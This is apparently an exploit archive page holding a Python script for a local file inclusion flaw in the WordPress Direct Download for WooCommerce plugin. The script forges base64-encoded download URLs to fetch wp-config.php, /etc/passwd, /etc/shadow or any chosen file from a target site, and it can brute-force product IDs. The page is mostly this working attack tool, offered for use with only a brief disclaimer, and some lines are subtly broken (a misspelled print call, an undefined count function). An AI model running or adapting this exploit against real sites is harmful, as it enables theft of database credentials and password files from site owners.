exploit the possibilities

WordPress WooCommerce Direct Download Local File Inclusion

WordPress WooCommerce Direct Download Local File Inclusion
Posted Jan 17, 2017
Authored by Diego Celdran Morell

WordPress Direct Download for WooCommerce versions up to 1.15 suffer from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | bb66f3e733500d157bafada42f0d1eba

WordPress WooCommerce Direct Download Local File Inclusion

Change Mirror Download
#lfi_attack_for_direct_download_woocommerce.py

#
# Author: Diego Celdran Morell
# Web: http://www.diegoceldran.es/
# Fecha Ultima actualizacion: 15/01/2017
# Version: V1.0
# No me hago responsable del mal uso que se le pueda dar a esta herramienta
#

import os;


try:
#pip install urlopen
import requests;

except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install requests");
from urllib2 import urlopen


try:
#pip install urlopen
import base64;

except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install base64");
import base64


def make_exploit(download_link):
lnk_download = download_link;

parts = lnk_download.split("/direct-download/");
toDecode = parts[1];
domain = parts[0];

if (toDecode[:-1] == "/"):
toDecode = toDecode[:count(toDecode)-1];

else:
toDecode = toDecode;

decoded = str(base64.b64decode(toDecode.encode('ascii')).decode('utf-8'));

productID = decoded.split("|")[0];

print(" ");
print(" ProductID: " + productID);
print(" ");
eject_exploit(productID, domain);


def eject_exploit(productID, domain):
print(" Select a file to download");
print(" [0] wp-config.php");
print(" [1] /etc/passwd");
print(" [2] /etc/shadow");
print(" or select another path to file to download");
print(" ");
optDownload = input(" >>> ");
print(" ");


if (domain[:7] == "http://"):
domain = domain;

elif (domain[:8] == "https://"):
domain = domain;

else:
domain = "http://" + domain;


if (optDownload == "0"):
fileToDownload = "wp-config.php";

elif (optDownload == "1"):
fileToDownload = "/etc/passwd";

elif (optDownload == "2"):
fileToDownload = "/etc/shadow"

else:
fileToDownload = optDownload;

url = domain + "/direct-download/" + base64.b64encode((str(productID) + "|" + fileToDownload).encode('ascii')).decode('utf-8');

print(" Downloading " + fileToDownload + " file from " + domain);
print(" Accesing to " + url);
print(" ");

req = requests.get(url);

if (req.status_code == 200):
print(" File downloaded correctly!");

fileName = fileToDownload.replace("\\", "/");
file = fileName.split("/");
fileText = str(file[-1]);

f = open(fileText, 'w');

f.write(req.text);

f.close();

print(" Acces to this file in: " + str(os.path.dirname(os.path.abspath(__file__))) + " folder");
print(" ");

else:
print(" [-] This domain is not vulnerable");

eject_exploit(productID, domain);


def get_product_id(domain, minID, maxID):
if(maxID == False):
maxID = 999999999999999999;

url = "";

if (domain[:7] == "http://"):
print(domain[:7]);
url = domain;

elif (domain[:8] == "https://"):
prin(domain[:8]);
url = domain;

else:
url = "http://" + domain;


if (url[:-1] == "/"):
url = url + "direct-download/";

else:
url = url + "/direct-download/";


actuallyId = minID;
idProduct = 0;

while (idProduct == 0 and actuallyId <= maxID):
encodedURL = base64.b64encode((str(actuallyId) + "|").encode('ascii'));
urlToTest = url + str(encodedURL.decode("utf-8")) + "/"
print(" Testing ID: " + str(actuallyId) + "; Getting URL: " + urlToTest);
#print("");

req = requests.get(urlToTest);

if (req.status_code == 200):

if("This product is not available for direct free download." in req.text):
# testing text you recibe
print(" [-] No product fount with ID: " + str(actuallyId));
print(" ");

else:
print(" [+] A product ID was fount: " + str(actuallyId));
print(" ");
idProduct = actuallyId;

else:
print(" [-] This domain is not vulnerable");

actuallyId = actuallyId+1;

if (idProduct != 0):
eject_exploit(idProduct, domain);


def testin_get_a_download_link(domain):
print(" Do you want try to find a valid URL for the website?");
print(" [0] no, exit");
print(" [1] yes, it may have a long time");
print(" ");
test_find = input(" >>> ");
print(" ");

if (test_find == "1"):
# Proseguir
print(" Please select the minimun id to find the product (0 to none; minimun id to start recomended: 400)");
minID = input(" >>> ");
print(" ");

if (minID == "0"):
minID = 1;

else:
minID = int(minID);

print(" Please select the maximun id to find the product (0 to stop manually when you want)");
maxID = input(" >>> ");
print(" ");

if (maxID == "0"):
maxID = False;

else:
maxID = int(maxID);

get_product_id(domain, minID, maxID);

else:
exit();


def get_download_link(domain):
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");

if (download_link == "0"):
testin_get_a_download_link(domain);

else:
make_exploit(download_link);


def get_download_link_no_domain():
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");

if (download_link == "0"):
print(" Please, select the domain to attack");
domain = input(" >>> ");
print("");
testin_get_a_download_link(domain);

else:
make_exploit(download_link);


def check_vulnerable_domain(domain = "diegoceldran.es"):
# Check if domain/direct-download/a/ return any thing
if (domain[:7] == "http://"):
url = domain;

elif (domain[:8] == "https://"):
url = domain;

else:
url = "http://" + domain;

if (url[:-1] == "/"):
url = url + "direct-download/a/";

else:
url = url + "/direct-download/a/";


req = requests.get(url);
if (req.status_code == 200):
print(" The web site: " + url + " respond: ");
print(" " + req.text);
print(" [+] This domain is maybe vulnerable");
print(" ");

get_download_link(domain);

else:
print(" [-] This domain is not vulnerable");

print(" ");
print(" LFI Attack for Direct Download Woocommerce plugin is started!");
print(" ");
print(" If you're using this module out of BrutiFramework, please, visit");
print(" http://www.diegoceldran.es/brutiframework-alfa/ to Download ");
print(" BrutiFramework from the oficial site. Thanks!");
print(" ");
print(" IMPORTANT:\n NO USE THIS EXPLOIT FOR ILEGAL PURPOSES");
print(" ");
print(" Select the target: (ej: www.diegoceldran.es)");
print(" [0] Omit the checking progress");
print(" ");
domain = input(" >>> ");
if (domain != "0"):
print(" ");
print(" Checking " + domain + "...");
print(" ");
check_vulnerable_domain(domain);

else:
print(" ");
get_download_link_no_domain();
Login or Register to add favorites

File Archive:

November 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    19 Files
  • 2
    Nov 2nd
    25 Files
  • 3
    Nov 3rd
    8 Files
  • 4
    Nov 4th
    7 Files
  • 5
    Nov 5th
    24 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    106 Files
  • 11
    Nov 11th
    19 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    12 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    12 Files
  • 19
    Nov 19th
    4 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    14 Files
  • 24
    Nov 24th
    19 Files
  • 25
    Nov 25th
    4 Files
  • 26
    Nov 26th
    1 Files
  • 27
    Nov 27th
    4 Files
  • 28
    Nov 28th
    1 Files
  • 29
    Nov 29th
    11 Files
  • 30
    Nov 30th
    7 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close